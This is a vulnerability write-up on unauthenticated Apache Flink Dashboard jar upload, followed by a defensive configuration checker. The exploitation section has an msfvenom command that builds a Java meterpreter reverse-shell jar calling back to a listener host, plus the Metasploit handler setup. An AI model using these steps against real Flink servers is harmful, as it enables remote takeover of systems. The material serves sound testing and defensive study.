# Apache Flink Unauthorized Access Vulnerability

## Vulnerability Description

The Apache Flink Dashboard has no user authentication by default. An attacker can directly upload a trojan jar package through the unauthorized Flink Dashboard console and remotely execute any system command to obtain server privileges.

## Environment setup

Test version: flink-1.15.1

Modify `flink-1.15.1/conf/flink-conf.yaml` to open port 8081.

![image-20230130110811353](/files/CBSBnTYjTDs163VORCUe)

Start Flink:

```
start-cluster.sh
```

## Vulnerability Exploitation

Access the web page.

![image-20230130110857282](/files/RilAHP7BAwsuxdjJSpiG)

Use msfvenom to generate rce.jar:

```
┌──(root💀kali)-[/tmp]
└─# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.32.130 LPORT=4444 -f jar > rce.jar
Payload size: 5310 bytes
Final size of jar file: 5310 bytes
```

Configure msf listening:

```
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.32.130
lhost => 192.168.32.130
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
```

Upload the `rce.jar` file under Submit New Job and click Submit.

![image-20230130110921888](/files/LPVhSlsuInTYc8Y2cz4m)

The shell is obtained successfully.

![image-20230130110926718](/files/mVmJWc98xPvOM3znxppv)
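
A defensive check for the exposure described on this page, as an added example that is not part of the original page: it parses a `flink-conf.yaml` and flags settings that leave the dashboard reachable without authentication. The sample config is constructed, and treating an unset `rest.bind-address` as exposed is an assumption.

```python
import re

# Constructed sample config (not from the page): dashboard bound to all interfaces.
SAMPLE_CONF = """\
jobmanager.rpc.address: localhost
rest.port: 8081
rest.bind-address: 0.0.0.0
#web.submit.enable: false
"""

LOOPBACK = {"localhost", "127.0.0.1", "::1"}


def parse_flink_conf(text):
    """Parse the flat 'key: value' lines of flink-conf.yaml, dropping '#' comments."""
    conf = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = re.match(r"^([A-Za-z0-9_.\-]+)\s*:\s*(.*)$", line)
        if m:
            conf[m.group(1)] = m.group(2).strip().strip("'\"")
    return conf


def is_true(conf, key, default):
    return conf.get(key, default).strip().lower() == "true"


def audit(conf):
    """Return findings for settings that leave the REST API and dashboard open."""
    findings = []
    bind = conf.get("rest.bind-address")
    # Assumption: an unset bind address is treated as exposed (not loopback-only).
    exposed = bind is None or bind not in LOOPBACK
    if exposed:
        findings.append(f"rest.bind-address={bind or '<unset>'}: REST port reachable off-host")
    if is_true(conf, "web.submit.enable", "true"):
        findings.append("web.submit.enable=true: jar upload from the web UI is allowed")
    mtls = is_true(conf, "security.ssl.rest.enabled", "false") and is_true(
        conf, "security.ssl.rest.authentication-enabled", "false")
    if exposed and not mtls:
        findings.append("REST mutual TLS off: exposed port accepts unauthenticated clients")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_flink_conf(SAMPLE_CONF)):
        print("[!]", finding)
```

Setting `web.submit.enable: false` only removes the upload feature from the web UI and is not authentication. Keeping the REST port on loopback or behind an authenticating proxy remains the primary control.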

